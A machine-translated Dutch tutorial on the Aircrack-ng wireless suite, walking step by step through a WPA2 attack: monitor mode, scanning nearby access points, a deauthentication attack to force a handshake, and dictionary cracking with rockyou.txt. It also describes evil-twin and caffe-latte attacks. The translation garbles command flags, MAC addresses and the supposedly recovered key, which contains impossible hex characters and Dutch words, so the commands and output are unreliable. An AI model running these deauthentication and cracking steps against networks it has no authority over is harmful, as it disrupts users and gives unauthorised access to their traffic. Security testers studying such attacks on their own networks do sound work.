Hoe Aircrack-ng . te gebruiken

How Use Aircrack Ng



Meestal denken mensen nooit na over het netwerk waarmee ze zijn verbonden. Ze staan ​​er nooit bij stil hoe veilig dat netwerk is en hoeveel ze dagelijks hun vertrouwelijke gegevens riskeren. U kunt kwetsbaarheidscontroles uitvoeren op uw wifi-netwerken met behulp van een zeer krachtige tool genaamd Aircrack-ng en Wireshark. Wireshark wordt gebruikt om netwerkactiviteit te controleren. Aircrack-ng is meer een agressieve tool waarmee je kunt hacken en toegang kunt geven tot draadloze verbindingen. Denken als een indringer is altijd de veiligste manier geweest om jezelf te beschermen tegen een hack. U kunt mogelijk de exacte acties begrijpen die een indringer zal nemen om toegang te krijgen tot uw systeem door meer te weten te komen over aircrack. U kunt dan nalevingscontroles uitvoeren op uw eigen systeem om ervoor te zorgen dat het niet onveilig is.

Aircrack-ng is een volledige set software die is ontworpen om wifi-netwerkbeveiliging te testen. Het is niet zomaar een enkele tool, maar een verzameling tools, die elk een bepaald doel dienen. Er kan aan verschillende gebieden van wifi-beveiliging worden gewerkt, zoals het bewaken van het toegangspunt, testen, het netwerk aanvallen, het wifi-netwerk kraken en het testen. Het belangrijkste doel van Aircrack is om de pakketten te onderscheppen en de hashes te ontcijferen om de wachtwoorden te kraken. Het ondersteunt bijna alle nieuwe draadloze interfaces. Aircrack-ng is een verbeterde versie van een verouderde toolsuite Aircrack, ng verwijst naar de Nieuwe generatie . Enkele van de geweldige tools die samenwerken om een ​​grotere taak uit te voeren.







lucht:

Airmon-ng is inbegrepen in de aircrack-ng-kit die de netwerkinterfacekaart in de monitormodus plaatst. Netwerkkaarten accepteren meestal alleen pakketten die op hen zijn gericht, zoals gedefinieerd door het MAC-adres van de NIC, maar met airmon-ng worden alle draadloze pakketten, of ze nu voor hen zijn bedoeld of niet, ook geaccepteerd. U zou deze pakketten moeten kunnen opvangen zonder te linken of te authenticeren met het toegangspunt. Het wordt gebruikt om de status van een toegangspunt te controleren door de netwerkinterface in de monitormodus te zetten. Eerst moet je de draadloze kaarten configureren om de monitormodus in te schakelen en vervolgens alle achtergrondprocessen uitschakelen als je denkt dat een proces het verstoort. Nadat de processen zijn beëindigd, kan de monitormodus worden ingeschakeld op de draadloze interface door de onderstaande opdracht uit te voeren:



[e-mail beveiligd] :~$sudoairmon-ng start wlan0#

U kunt de monitormodus ook uitschakelen door de airmon-ng op elk gewenst moment te stoppen met behulp van de onderstaande opdracht:

[e-mail beveiligd] :~$sudoairmon-ng stop wlan0#

Luchtstroom:

Airodump-ng wordt gebruikt om alle netwerken die ons omringen op te sommen en om waardevolle informatie over hen te bekijken. De basisfunctionaliteit van airodump-ng is het snuiven van pakketten, dus het is in wezen geprogrammeerd om alle pakketten om ons heen te pakken terwijl het in de monitormodus wordt gezet. We zullen het uitvoeren tegen alle verbindingen om ons heen en gegevens verzamelen zoals het aantal clients dat op het netwerk is aangesloten, hun overeenkomstige mac-adressen, coderingsstijl en kanaalnamen en beginnen ons vervolgens op ons doelnetwerk te richten.

Door de opdracht airodump-ng te typen en deze de naam van de netwerkinterface als parameter te geven, kunnen we deze tool activeren. Het toont alle toegangspunten, het aantal datapakketten, de gebruikte coderings- en authenticatiemethoden en de naam van het netwerk (ESSID). Vanuit het oogpunt van hacking zijn de mac-adressen de belangrijkste velden.

[e-mail beveiligd] :~$sudoairodump-ng wlx0mon

Luchtscheur:

Aircrack wordt gebruikt voor het kraken van wachtwoorden. Nadat we alle pakketten met airodump hebben vastgelegd, kunnen we de sleutel per luchtkraak kraken. Het kraakt deze sleutels met behulp van twee methoden PTW en FMS. De PTW-aanpak gebeurt in twee fasen. In het begin worden alleen de ARP-pakketten gebruikt, en pas daarna, als de sleutel niet is gekraakt na het zoeken, worden alle andere vastgelegde pakketten gebruikt. Een pluspunt van de PTW-aanpak is dat niet alle pakketten worden gebruikt voor het kraken. In de tweede benadering, d.w.z. FMS, gebruiken we zowel de statistische modellen als de brute force-algoritmen voor het kraken van de sleutel. Er kan ook een woordenboekmethode worden gebruikt.

Airplay:

Airplay-ng introduceert pakketten in een draadloos netwerk om verkeer te creëren of te versnellen. Pakketten van twee verschillende bronnen kunnen worden vastgelegd door aireplay-ng. De eerste is het live-netwerk en de tweede is de pakketten van het reeds bestaande pcap-bestand. Airplay-ng is handig tijdens een deauthenticatie-aanval die gericht is op een draadloos toegangspunt en een gebruiker. Bovendien kun je sommige aanvallen, zoals een koffie latte-aanval, uitvoeren met airplay-ng, een tool waarmee je een sleutel van het systeem van de klant kunt krijgen. U kunt dit bereiken door een ARP-pakket op te vangen en het vervolgens te manipuleren en terug te sturen naar het systeem. De client zal dan een pakket maken dat kan worden opgevangen door airodump en aircrack kraakt de sleutel van dat gewijzigde pakket. Enkele andere aanvalsopties van airplay-ng zijn chopchop, fragment arepreplay, enz.

Lucht basis:

Airbase-ng wordt gebruikt om de computer van een indringer om te vormen tot een gecompromitteerd verbindingspunt waarmee anderen kunnen linken. Met Airbase-ng kunt u beweren een legaal toegangspunt te zijn en man-in-the-middle-aanvallen uit te voeren op computers die op uw netwerk zijn aangesloten. Dit soort aanvallen worden Evil Twin Attacks genoemd. Het is voor basisgebruikers onmogelijk om onderscheid te maken tussen een legaal toegangspunt en een nep toegangspunt. De kwaadaardige tweelingdreiging is dus een van de meest bedreigende draadloze bedreigingen waarmee we vandaag worden geconfronteerd.

Airolib-ng:

Airolib versnelt het hackproces door de wachtwoordlijsten en het toegangspunt op te slaan en te beheren. Het databasebeheersysteem dat door dit programma wordt gebruikt, is SQLite3, dat meestal beschikbaar is op alle platforms. Het kraken van wachtwoorden omvat de berekening van de paarsgewijze hoofdsleutel waarmee de persoonlijke tijdelijke sleutel (PTK) wordt geëxtraheerd. Met behulp van de PTK kun je de frame-berichtidentificatiecode (MIC) voor een bepaald pakket bepalen en theoretisch vinden dat de MIC vergelijkbaar is met het pakket, dus als de PTK gelijk had, had de PMK ook gelijk.

Typ de volgende opdracht om de wachtwoordlijsten en toegangsnetwerken te zien die zijn opgeslagen in de database:

[e-mail beveiligd] :~$sudoairlib-ng testdatabase –stats

Hier is testdatabase de db die u wilt openen of maken, en -stats is de bewerking die u erop wilt uitvoeren. U kunt meerdere bewerkingen uitvoeren op de databasevelden, zoals het geven van maximale prioriteit aan een SSID of zoiets. Voer de volgende opdracht in om airlib-ng met aircrack-ng te gebruiken:

[e-mail beveiligd] :~$sudoaircrack-ng-Rtestdatabase wpa2.eapol.cap

Hier gebruiken we de reeds berekende PMK's die zijn opgeslagen in de testdatabase om het kraken van wachtwoorden te versnellen.

WPA/WPA2 kraken met Aircrack-ng:

Laten we eens kijken naar een klein voorbeeld van wat aircrack-ng kan doen met behulp van een paar van zijn geweldige tools. We zullen de vooraf gedeelde sleutel van een WPA/WPA2-netwerk kraken met behulp van een woordenboekmethode.

Het eerste dat we moeten doen, is een lijst maken van netwerkinterfaces die de monitormodus ondersteunen. Dit kan met het volgende commando:

[e-mail beveiligd] :~$sudoairmon-ng

PHY Interface Driver Chipset

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

We kunnen een interface zien; nu moeten we de netwerkinterface die we hebben gevonden ( wlx0 ) in de monitormodus zetten met behulp van de volgende opdracht:

[e-mail beveiligd] :~$sudoairmon-ng start wlx0

Het heeft de monitormodus ingeschakeld op de interface genaamd wlx0mon .

Nu zouden we moeten gaan luisteren naar uitzendingen van nabijgelegen routers via onze netwerkinterface die we in de monitormodus hebben gezet.

[e-mail beveiligd] :~$sudoairodump-ng wlx0mon

CH5 ][verstreken:30s][ 2020-12-02 00:17



BSSID PWR-bakens#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Vier vijf 62 27 0 154e WPA2 CCMP PSK CrackIt

C4:E9:84:76:10:ZIJN-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8:3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:GEEFT:88:FA:38: 02-68 28 2 0 elf54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR-snelheid verloren frames-sonde



E4: 6F:13: 04: CE:315C:3A:Vier vijf: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31voor Christus:91:B5:F8:7E:D5 -390e-1 1002 13

Ons doelnetwerk is: Breek het in dit geval, die momenteel op kanaal 1 draait.

Om hier het wachtwoord van het doelnetwerk te kraken, moeten we een 4-way handshake vastleggen, wat gebeurt wanneer een apparaat verbinding probeert te maken met een netwerk. We kunnen het vastleggen met behulp van de volgende opdracht:

[e-mail beveiligd] :~$sudoairodump-ng-C 1--bssid E4: 6F:13: 04: CE:31 -in /thuis wlx0

-C : Kanaal

–Bss : Bssid van het doelnetwerk

-in : De naam van de map waar het pcap-bestand zal worden geplaatst

Nu moeten we wachten tot een apparaat verbinding maakt met het netwerk, maar er is een betere manier om een ​​handdruk vast te leggen. We kunnen de apparaten de-authenticeren naar de AP met behulp van een de-authenticatie-aanval met behulp van de volgende opdracht:

[e-mail beveiligd] :~$sudoaireplay-ng-0 -totE4: 6F:13: 04: CE:31

tot : Bssid van het doelnetwerk

-0 : deauthenticatie-aanval

We hebben alle apparaten losgekoppeld en nu moeten we wachten tot een apparaat verbinding maakt met het netwerk.

CH1 ][verstreken:30s][ 2020-12-02 00:02][WPA-handdruk: E4: 6F:13: 04: CE:31



BSSID PWR RXQ-bakens#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154e WPA2 CCMP PSK P



BSSID STATION PWR-snelheid verloren frames-sonde



E4: 6F:13: 04: CE:31voor Christus:91:B5:F8:7E:D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C:3A:Vier vijf: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27:7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67:D3:C2:CD:D7 -350e- 6e263 708Breek het

E4: 6F:13: 04: CE:31D4: 6A: 6A:99:ED:E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C:C3:07:56:61: EF -37 0- 1e0 1

We hebben een treffer, en door naar de rechterbovenhoek te kijken, direct naast de tijd, kunnen we zien dat er een handdruk is vastgelegd. Kijk nu in de opgegeven map ( /huis in ons geval ) voor a .pcap het dossier.

Om de WPA-sleutel te kraken, kunnen we de volgende opdracht gebruiken:

[e-mail beveiligd] :~$sudoaircrack-ng-a2 -inrockyou.txt-BE4: 6F:13: 04: CE:31handdruk.cap

b :Bssid van het doelnetwerk

-a2: WPA2-modus

Rockyou.txt: Het woordenboekhet dossiergebruikt

Handshake.cap: Thehet dossier diebevat vastgelegde handdruk

Aircrack-ng1.2beta3

[00:01:49] 10566sleutels getest(1017.96tot/s)

SLEUTEL GEVONDEN! [je hebt me]

Hoofdsleutel: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FvijftigC


Voorbijgaande sleutel: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FvijftigC025 62E9 5D71

De sleutel tot ons doelnetwerk is met succes gekraakt.

Conclusie:

Draadloze netwerken zijn overal en worden door elk bedrijf gebruikt, van werknemers die smartphones gebruiken tot industriële besturingsapparaten. Volgens onderzoek zal in 2021 bijna 50 procent van het internetverkeer over wifi gaan. Draadloze netwerken hebben veel voordelen, communicatie buiten de deur, snelle internettoegang op plekken waar het bijna onmogelijk is om draden te leggen, kunnen het netwerk uitbreiden zonder kabels aan te leggen voor elke andere gebruiker, en kunt u uw mobiele apparaten gemakkelijk verbinden met uw thuiskantoren terwijl u er niet bent.

Ondanks deze voordelen, is er een groot vraagteken over uw privacy en veiligheid. Zoals deze netwerken; binnen het zendbereik van routers zijn voor iedereen toegankelijk, ze kunnen gemakkelijk worden aangevallen en uw gegevens kunnen gemakkelijk worden aangetast. Als u bijvoorbeeld bent verbonden met een openbare wifi, kan iedereen die met dat netwerk is verbonden, eenvoudig uw netwerkverkeer controleren met behulp van wat intelligentie en met behulp van geweldige beschikbare tools en het zelfs dumpen.